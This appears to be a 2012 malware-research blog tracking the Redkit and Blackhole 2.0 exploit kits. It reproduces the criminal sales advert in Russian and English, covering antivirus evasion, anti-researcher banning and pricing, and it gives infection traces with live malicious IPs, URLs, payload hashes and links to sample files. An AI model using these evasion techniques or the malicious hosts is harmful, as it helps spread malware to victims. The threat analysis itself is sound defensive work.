
0

Not making the headlines but yet effective (doesn't need a 0 day to reach 20% break) Redkit Exploit Kit has also (again...no news here) integrated the last Vulnerability from java.

polremo.pl/censored.html

Funny message on successful trigger of Redkit Landing page

[[ Remind me one of the first domain for Gimemo Ransomware landings : "nextcarferrari.com"

Domain used in Gimemo Ransom campaign

]]

polremo.pl/88censored.jar --> 5b0bc70c76c7c48fc34105591e5837fe

polremo.pl/33censored.jar (HTTP 404)

CVE-2012-4681 piece of code found in a jar dropped by Redkit Exploit kit

In fact, was expecting more obfuscation in the code from this finely tuned EK
Note, as for Sakura, the final payload did not reach the targeted computer (but can't tell why).

Post of this blog about Redkit :
Inside RedKit Exploit Kit - Exploit Kit Customer Control Panel 2012-05-05
#Redkit not so red anymore - Adaptation in action 2012-05-08
Redkit - one account = one color 2012-06-22

Blackhole Exploit Kits update to v2.0

September 11, 2012, 11:24 pm

≫ Next: Fast look at an infection by a Blackhole Exploit Kit 2.0

≪ Previous: CVE-2012-4681 - Redkit Exploit Kit - I want Porche Turbo

$

0

0

Paunch notification on Exploit.in about v2.0

Original text of the Advert ( Pastebin )  (for rough translation see at bottom - Illustration of an infection + related files in this post.)

BlackHole exploit Kit 2.0

Рады приветствовать вам совершенно новую версию связки эксплойтов. За более чем 2 года существования нашего проекта, старый движок связки изрядно заездили и затаскали, АВ компании стали очень быстро распознавать по неким критериям что это BlackHole и помечать ее как malware. В новой версии мы переписали все с нуля, причем с нуля переписана не только часть с выдачей эксплойтов, но и админ панель.


Из новшеств по выдаче:
1. Мы максимально защитили эксплойты от автоскачивания их АВ компаниями, теперь генерируется динамический УРЛ, который действителен в течении нескольких секунд, нужных лишь для одного заражения потенциально заходящего на ссылку человека.
2. Теперь так же максимально защищен и ваш ехе, АВ компания не сможет его просто так скачать, что позволит держать ваши ехе максимально долго в чистоте.
3. JAR и PDF файлы выдаются только тем версиям плагинов, которые уязвимы, если плагин не уязвим, сплойт не выдается, и не пачкается лишний раз.
4. Нам удалось отказаться от plugindetect для определения версии явы, что позволило убрать из связки много лишнего кода ускорив тем самым загрузку связки, а так же файл getJavaInfo, который запускал ява машину у всех заходящих, вне зависимости от того уязвим этот человек или нет.
5. Были убраны все старые эксплойты, дающие мизерный пробив но пугающие визуальными оповещениями и крешами браузера, такие как Flash, HCP, PDF All... Теперь в связке в админке числятся 3 эксплойта: Java Pack (atomic + byte), PDF LibTiff, MDAC (его оставили потому как он не крешит браузер, не палится аверами так как нам удалось его вычистить, и на старом ИЕ6 до сих пор работает как надо)
6. В версии 1.* ссылка на трафик к сожалению была распознаваемой для АВ компаний и для реверсеров, вид у нее был такого вида, ./main.php?varname=lgjlrewgjlrwbnvl2. В новой версии ссылку на трафик вы можете составлять сами, вот пару примеров: /news/index.php, /contacts.php и так далее, теперь за этот момент ни 1 АВ не сможет зацепиться. Причем по умолчанию имена потоков при создании потока создаются автоматически из словарика с реальными словами а не рандомными буквами.
7. Выдача теперь отдается ТОЛЬКО уникальным пользователям, что показывать при повторном заходе решать только вам, это может быть как HTML заглушка отредактированная лично вами, так и редирект на допустим ваш лендинг или любой другой сайт.
8. Теперь все урлы динамические, без постоянных имен переменных за которые можно было бы зацепиться, файла для скачивания ехе теперь просто напросто нет, или урла на JAR, теперь все пути идут непосредственно на файл на который ты пришел.
Разработано и внедрено еще очень много фишек которыми хвастаться и орать в паблике просто не резонно, дабы конкуренция и АВ компании не дремлят.


Из новшеств в админ панели:
1. Ввели captcha при авторизации, на нашей практике было достаточно не мало случаев взлома админ панелей клиентов путем брута, это должно не много притормозить неких умников.
2. Статистику по потоку теперь легко можно посмотреть выбрав его из выпадающего меню на главной странице статистики, так же станет доступна для быстрого просмотра и копирования ссылка на гостевую статистику.
3. Теперь админка не будет тормозить при достижении 1-2кк трафа, да и вообще не будет тормозить, вся нагрузка распределена на скрипты исполняющиеся по крону и группировку кучи логов в 1 запись, это позволит вообще не обнулять статистику и копить ее чуть ли не годами. По сути 2.0 версию мы писали для того, что бы объемы связка могла держать в разы больше чем старая версия, чего мы успешно добились.
4. Добавлена возможность использовать в качестве вспомогательного инструмента для производительности Memcached, причем очень удобно, его можно и не использовать для тех у кого объемы трафика не валят сервер.
5. К списку операционок добавлены Win 8 и мобильные устройства, для того что бы увидеть сколько в вашем трафике мобильного, причем мобильный трафик вы сможете редиректить на соответствующие партнерки.
6. В патоках мы так же увидим новшества, ранее было возможно оперировать двумя типами правил, эксплойты и редиректы, сейчас добавился пункт Заглушка. Заглушка служит для отображения статичной html странички. К примеру, вы можете сделать заглушку для гугл хром трафика, и там создать страничку с текстом такого рода: Эта страница работает только в Internet Explorer, Opera, Firefox.
7. Теперь появилась долгожданная фишка, отключения потока при Палеве ехе файла. Система сама проверяет палево вашего файла через указанное вами время при добавлении файла.
8. Появилась возможность использовать связку как прокладку, между источником трафа и местом ее назначения, для чего при создании потока появилась возможность указывать урл для редиректа отработанных связкой трафа. Полезно для пропускания трафа через несколько связок, либо для последующего редиректа на лэндинги.
9. При добавлении к файлу появилась возможно указывать периодичность проверки этого файла на палево АВ, а так же периодичность обновления файла с урла (если этот файл добавляется по урлу).
10. Появилось новое меню "Версии софта", там мы сможем наблюдать версии плагинов Java, Acrobat reader вашего трафика, видеть пробив каждой из версий, мониторить качество трафика путем просмотра, предоставляет ли трафер пробиваемые плагины в своем трафике. Очень полезно для оценки качества трафика и для мониторинга корректной работы сплойтах на нужных версиях плагинов.
11. Полностью обновили раздел "Безопасность", о нем можно посветить даже целый подраздел:
а) появилась возможность блокировать трафик без рефереров (рекомендуем всегда держать включенным)
б) появилась возможность банить не нужные рефереры
в) появилась возможность банить все рефереры кроме указанных вами
г) появилась возможность банить ботов по заранее подготовленной базе из 13к ипов (спасибо xshaman) (рекомендуем всегда держать включенным)
д) появилась возможность банить TOR сети, ипы которых обновляются динамически, как показала практика большинство реверсеров работают от туда (рекомендуем всегда держать включенным)
е) появился режим записи, допустим вы остановили трафик и ждать трафика вам не от куда, ставите режим записи, и все реверсеры и боты которые идут на вашу ссылку после остановки трафа прямиком идут в бан лист)
12. Так как в разделе 11 у нас появилось много возможностей для банов, то при выборе хотя бы 1 варианта бана, в меню появляется "Бан статистика", в которой можно видеть количество заблокированного трафика, и причину блокировки
13. В разделе настроек теперь мы можем указывать более детально, что мы хотим делать с статистикой рефереров (Не вести учет рефереров, Вести учет рефереров, Вести учет рефереров без отображения в гостевой стате)
14. Появилась возможность обновлять базу GeoIP одним кликом в админке
15. Всеми ожидаемая возможность возможность выключать связку при палевном домене, выглядит это примерно так: вы выбираете при каком количестве АВ домен считать не чистым (например 1), как только домен попадает в блек по 1 ав, он переключается на следующий. Так же есть возможность указывать что делать в случае если чистые домены закончатся, отключать связку полностью, либо использовать не чистый домен.
16. В связи с настройкой описанной в пункте 15 появилось новое меню "Домены", где мы можем добавлять списки доменов, видеть их палевность, управлять ими полностью, а так же возможность получить API ссылку для определенного потока, по которой можно будет видеть всегда чистую ссылку на трафик.
На самом деле версия 2.0 это не продолжение старой связки, это совершенно новая система написанная полностью с нуля учитывая просьбы клиентов собираемые на протяжении более 2 лет эксплуатации версии 1.*



Так же рады сообщить, что цены остались такими же:

Аренда на нашем сервере:
-сутки аренды - 50$ (лимит по трафику 50к хитов)
-неделя аренды - 200$ (лимит по трафику 70к хитов в сутки)
-месяц аренды - 500$ (лимит по трафику 70к хитов в сутки)
при нужде лимит трафика можно повысить за доп. плату

Лицензия на вашем сервере:
-Лицензия на 3 месяца 700$
-Лицензия на пол года 1000$
-Лицензия на год 1500$
мультидоменная версия связки - 200$ разово на весь срок лицензии (привязка не на домен а на айпи)
смена домена на стандартной версии связки - 20$
смена ip на мультидоменной версии связки - 50$
разовая чистка - 50$
авточистки на месяц - 300$ (чистки заливаются сами вам на сервер, сразу как спалится ваш криптор)


-------------------
В связи с тем что в топике версии 1.* накопилось очень много отзывов и сообщений, под версию 2.0 выделен отдельный топик, а старый топ будет закрыт как архивный, вот ссылка на него:http://exploit.in/forum/index.php?showtopic=41662


Наши контакты:

Автор и саппорт в 1 лице (время работы ненормированное):
JID: paunch@jabber.no
JID: paunch@thesecure.biz
JID: paunch@neko.im
ICQ: 343002

Саппорт (время работы с 9 до 19 по будням):
JID: blackhole2@jabber.ru
ICQ: 530082

--Google Translate-- (Pastebin )


BlackHole exploit Kit 2.0 

Are pleased to welcome you to a brand new version of the bundle of exploits. For more than 2 years of existence of our project, the old engine arrival and ligaments badly worn, AV companies have become very quick to recognize that this kind of criteria BlackHole and flag it as malware. In the new version we have rewritten from scratch, and re-written from scratch is not only part of the issuance of exploits, but also the admin panel.


Of the innovations on the issue (Translation improved by Denis Laskov ):
1.  Implemented maximum protection from Automatic systems for downloading exploits, used by AV companies: generate a dynamic URL, which is valid for a few seconds, you need only to one victim at a time.
2. Now, Your executable also protected from multiple downloads, AV company can not just download it, which will keep your exe as long as clean.
3. JAR and PDF exploits show only for   detected vulnerable versions of plug-ins  if the plug is not vulnerable,exploits not issued, and not get in detection loop.
4. We not using anymore plugindetect to determine the version of Java that will remove a lot of the bunch of extra code thus accelerating the download bundles, as well as file getJavaInfo, who ran the Java no matter of plugin version vulnerable or nor
5. Have been removed all the old exploits, giving tiny result but causing scare visual effects and browser crash, such as Flash, HCP, PDF-All ... Now the link in the admin area of ​​the number 3 Exploit: Java Pack (atomic + byte), PDF LibTiff, MDAC (he left because he did not crash the browser, still have  low-detection ratio, because we managed to clean up, and the old IE6 is still common in field)
6. In version 1. * link to malicious payload unfortunately was recognizable for AV companies and reversers, she looked this kind,. /Main.php?Varname=lgjlrewgjlrwbnvl2. The new version of the link to the malicious payload you can choose yourself, here are some examples: /news/index.php,/contacts.php and so on, now for the moment no one AV can not catch. And by default stream names when creating the flow created automatically from the dictionary with the actual words and not a random letters.
7. Issuing now given only unique users, when re-entering - its up to you to decide, what to do: it can be your HTML stub code, or redirect to your landing or any other site.
8. Now all URLs are dynamic, without permanent names for variables that could be detectable by mask, no file for exe download at all,  same to the JAR, now all that required is original path, which victim was pointed to.
Developed and implemented a lot more private tricks that author prefer not to disclose in public simply not reasonable, because competitors and the AV companies always sneak around.


Of the innovations in the admin panel:
1. Captcha entered for logging on to our practice, it was not enough to break a few cases the admin panel of clients by Brutus, it should not slow down a lot of some wise men.
2. Statistics on the flow now easy to see by selecting it from the drop down menu on the home page of statistics, will also become available for quick viewing and copying the reference to guest statistics.
3. Now the admin panel will not slow down when it reaches 1-2kn cores, and generally will not slow down, the entire load is distributed on the scripts are executed on the crown and the grouping of piles of logs in one account, it will never reset statistics and stash it almost years. Essentially version 2.0 we wrote for what amounts to a bunch of could hold many times more than the old version, which we successfully achieved.
4. Added the ability to be used as an aid to performance Memcached, and very convenient, and it can not be used for those who do not bring down the volume of traffic the server.
5. To the list of operating systems added to Win 8, and mobile devices, in order to see how much of your traffic is mobile, and mobile traffic, you can redirect to the appropriate affiliate.
6. In the molasses, we also see the innovations might have been allowed to operate with two types of rules, exploits and redirects now Add item stub. Plug is used to display a static html page. For example, you can make a plug for Google Chrome traffic, and there to create a page with the text of its kind: This page only works in Internet Explorer, Opera, Firefox.
7. Now it is a welcome feature, disable flow with fawn exe file. The system automatically checks the pale of your file through the time you specify when you add a file.
8. Now you can use a bunch as a gasket between the power cores and the place of her destination, for which to create an opportunity to select the stream URL to redirect to waste a bunch of cores. It is useful to pass a few cores ligaments, or for subsequent redirect to Landing.
9. When added to the file will be possible to specify the frequency of inspection of the file on the pale AB, as well as an update file with slashes (if the file is added to urlu).
10. There is a new menu item "Software Version", where we can watch the version of plugins Java, Acrobat reader of your traffic, see the breaking of each version, monitor the quality of traffic by looking at is whether trafer pierces the plug-ins in your traffic. It is very useful for evaluating the quality of traffic and to monitor the performance sployty on the right version of the plugin.
11. Completely updated "Security", about it can devote even a sub-section:
a) the opportunity to block traffic without referer (we recommend to always keep on)
b) the opportunity to ban unnecessary referrers
c) the opportunity to ban all referrers except those you
d) the opportunity to ban bots on a prepared base of 13k ipov (thanks xshaman) (recommend that you keep it turned on)
d) the opportunity to ban TOR network, Types which are dynamically updated as the practice most reversers work from there (it is recommended to always keep on)
e) there was a recording mode, let you stop the traffic and you do not have to wait for the traffic of which, put the record mode, and all reversers and bots that run on your link after stopping cores directly go to the ban list)
12. As in Section 11, we had many opportunities to bans, selecting at least one version of the ban, the menu, the "Ban Statistics", in which you can see the number of blocked traffic, and the reason for the lock
13. In the settings section, we can now specify in more detail what we want to do with the referrer statistics (not to record the referrer, and keep track referrers Keep track referrers without displaying the guest of the article)
14. An opportunity to update GeoIP database with one click in the admin
15. All of which had expected to able to disable a bunch of incriminating in the domain, it looks like this: when you choose how much AB domain considered not clean (eg 1) as soon as the domain gets in the black for one auto, it switches to the next. It is also possible to specify what to do if a net domains run out, turn off a bunch of completely, or use no net domain.
16. In connection with the adjustment described in paragraph 15, a new menu "Domains", where we can add lists of domains incriminating see them, manage them completely, as well as the opportunity to get API reference for a particular stream, on which you can always see a link to a clean traffic.
In fact, version 2.0 is not a continuation of the old bunch, is a completely new system written entirely from scratch, given the client is going to request for more than two years of operation, version 1. *



So glad to report that prices have remained the same:

Rent on our server:
-Day rental - $ 50 (limit traffic 50k hits)
-Week rent - $ 200 (limit traffic 70k hits a day)
-Month lease - $ 500 (limit traffic 70k hits a day)
if need traffic limit can be raised for the add. fee

The license for your server:
-License for 3 months $ 700
-The license for six months $ 1,000
License-year $ 1500
multidomain version bundle - $ 200 one-time fee for the duration of the license (not binding on the domain and the ip)
change of the domain on the standard version bundle - $ 20
change ip for multidomain version cords - $ 50
a one-time cleaning - $ 50
avtochistki a month - $ 300 (cleaning poured yourself on your server, as soon as your slept kriptor)


-------------------
Due to the fact that the topic for version 1. * Accumulated a lot of reviews and reports for version 2.0 allocated a separate topic, and the old top will be closed as a history, here is the link to it: http://exploit.in/forum/index. php? showtopic = 41662


Contacts:

Author and a support to one person (working normalized):
JID: paunch@jabber.no
JID: paunch@thesecure.biz
JID: paunch@neko.im
ICQ: 343002

A support (working hours from 9 to 19 on weekdays):
JID: blackhole2@jabber.ru
ICQ: 530082
-------------------------------------------------------

Blackhole 2.0 Login page with the Captcha

Illustration of an infection + related files in this post.

Edit 12/09/12 - 22:12 Some part of Google Translation improved Denis Laskov
Edit 13/09/12 - 02:14 Links to real case infection data.

Fast look at an infection by a Blackhole Exploit Kit 2.0

September 12, 2012, 4:43 pm

≫ Next: 1940 IPs for a BHEK/ULocker server - Nexcess-Net

≪ Previous: Blackhole Exploit Kits update to v2.0

$

0

0

Bet there is a new logo...but don't have it

If you didn't know that Blackhole Exploit Kit has been rewritten to version 2.0 take a look at this post
All files here : http://kafeine.minus.com/mbkP1Nl0bC

Goal of this post : show how an infection via the new version of Blackhole looks like.
Forget the main.php?page=0123456789abcdef and variants it's (almost) over now.
Will maybe update later with other Vuln path or other information related to 2.0

Video of the infection described below in 1...Useless but I like visual things. I did not wait till Live Security Platinum pop up cause i did not know if the payload had a GUI.

1 - Here is the complete fiddler trace for a CVE-2012-4681 infection path :

200 http://46.249.37.118 /links/differently-trace.php --> a464b3414a32203b10cf89e84b884609  (anubis report)
200 http://46.249.37.118 /links/differently-trace.php?
zexl=36070905070437020234050505343634353405060636060a330902340a033505
&lgyzvu=4833&evwi=nfsl&izcjjjxl=ycvrg --> d7f16e839aa3b0ec02c5d798ee184a5a (VT report)
Seems to be the same Jar that we found at same time on Blackhole that are not already updated.
404 http://46.249.37.118 /links/getJavaInfo.jar
404 http://46.249.37.118 /links/getJavaInfo.jar
404 http://46.249.37.118 /links/getJavaInfo.jar
200 http://46.249.37.118 /links/differently-trace.php?zexl=36070905070437020234050505343634353405060636060a330902340a033505
&lgyzvu=4833&evwi=nfsl&izcjjjxl=ycvrg  --> d7f16e839aa3b0ec02c5d798ee184a5a (yes same.. (?) )
404 http://46.249.37.118 /links/getJavaInfo.jar
404 http://46.249.37.118 /links/A.class
404 http://46.249.37.118 /links/A/class.class
200 http://46.249.37.118 /links/differently-trace.php?xwwrf=36070905070437020234050505343634353405060636060a330902340a033505
&fvjmvlke=03090708363335340408&vene=02&fch=lsm&wka=sxi --> a4ee53b38e3a8a1fdd720cb035d9873f
404 http://46.249.37.118 /links/differently-trace.php?gceol=36070905070437020234050505343634353405060636060a330902340a033505
&plq=45&lqhsb=03090708363335340408&sfemv=02000200020002
404 http://46.249.37.118 /links/getJavaInfo.jar
404 http://46.249.37.118 /links/getJavaInfo.jar
404 http://46.249.37.118 /links/getJavaInfo.jar
404 http://46.249.37.118 /links/getJavaInfo.jar
404 http://46.249.37.118 /links/A.class
404 http://46.249.37.118 /links/A/class.class
404 http://46.249.37.118 /links/A.class
404 http://46.249.37.118 /links/A/class.class

Files are available here : http://minus.com/lCoPbeqIs8DLr
Fiddler session is here : http://minus.com/lbjapThXMLSl6K

The payload just for those who wonder. Out of the scope of this post.

<edit2>

2-One more CVE-2012-4681 infection:

200 http://level.liborscam.info /links/tune-spreads-action.php > a1f3cca2be43825b25ec39cd10082083 (wepawet showing PluginDetect pointed by Websense and Aleksandr Matrosov)
200 http://level.liborscam.info /links/tune-spreads-action.php?ivpnaza=3306380338020a0b0b02360609350608350409050334350933080a3505063308
&oxn=3533&kqztigi=kkwxmuax&zuc=uvvibjqq -> 6a3757841ff61752fd24cbb84f67418c (vt report)
302 http://level.liborscam.info /links/getJavaInfo.jar
200 http://level.liborscam.info /links/tune-spreads-action.php?ivpnaza=3306380338020a0b0b02360609350608350409050334350933080a3505063308
&oxn=3533&kqztigi=kkwxmuax&zuc=uvvibjqq -> 6a3757841ff61752fd24cbb84f67418c (same)
302 http://level.liborscam.info /links/getJavaInfo.jar
200 http://level.liborscam.info /links/tune-spreads-action.php?uxytgf=3306380338020a0b0b02360609350608350409050334350933080a3505063308
&abnczdde=06090a3708050a063402&jvfagfn=02&pusr=uwelha&tibqqyl=rpfarbmb --> 18fb6c377458e52559b6044aed21b3f1 (vt report - must be a  Reveton Ransomware cause we can see an IP of the RP owned by our squatter from AS57999 )

302 http://level.liborscam.info /links/A.class
302 http://level.liborscam.info/links /A.class

Files are available here : http://minus.com/lbyzmpVJY34jSE

Fiddler session is here : http://minus.com/lwwbnnmDejV7C

Note: where i have been hit got a combo : Redkit + BH EK 2.0 and end up with Karagny, Zeus?  (config : http://91.238.82.95:80[/]_cp/gate.php ) and Reveton. Look like one Traffer is selling to 2 differents Clients

Double Strike BH EK 2.0 + Redkit EK

Full Fiddler session is here : http://minus.com/ljRcUfVcqI7yo if someone want to sort this out.

</edit2>
<edit3>

3-MDAC infection:

GET http://delivery.trafficbroker.com /rd.php?http://212.59.118.144/links/middle_granting.php

200 OK (text/html)

GET http://212.59.118.144 /links/middle_granting.php

200 OK (text/html)

GET http://java.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab

301 Moved Permanently to http://javadl-esd.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab

GET http://javadl-esd.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab

404 Not Found (text/html)

POST http://activex.microsoft.com /objects/ocget.dll

404 Not Found (text/html)

POST http://codecs.microsoft.com /isapi/ocget.dll

404 Not Found (text/html)

POST http://activex.microsoft.com /objects/ocget.dll

404 Not Found (text/html)

GET http://212.59.118.144 /links/middle_granting.php?rzy=37060a0933&qebtfeoy=39&arowcw=06090a3708050a063402&qxlhwqt=02000200020002

200 OK (application/pdf)  <-- eedfd.pdf 43497a7060d68bd1ef5add8276858c0e

GET http://212.59.118.144 /links/middle_granting.php?bjg=37060a0933&lsry=06090a3708050a063402&vedpt=04&cljdwo=cxlcbbox&aeh=wtorw

200 OK (application/x-msdownload) <-- Reveton Ransomware adbb24c15db2575d1d5415a17ac1010b

POST http://codecs.microsoft.com /isapi/ocget.dll

404 Not Found (text/html)

Download Fiddler session

</edit3>

> Yes Tor exit nodes are escaped.
> Yes double tilt with same IP won't trigger the landing Twice (502 error - 0 )

Is BH EK 2.0 exploiting CVE-2012-1535 which affect Flash 11.3.300.270 and previous ?...Paunch never mentionned it. Please anyone, comment if I'm wrong. The thread of this blackhole at least was not using it.

One useless video showing a computer vulnerable only (...for what we know) to CVE-2012-1535  running fine through this thread of that BH EK.

Edit: 13/09/12 - 08:03am - Added remark regarding plugin detect after Websense post.
Edit 2: Removed the remark regarding plugin detect..it's indeed part of the BH EK 2.0 Double Check after Aleksandr Matrosov tweet, the first landing in Fiddler Trace1
Edit3 : Add infection path : MDAC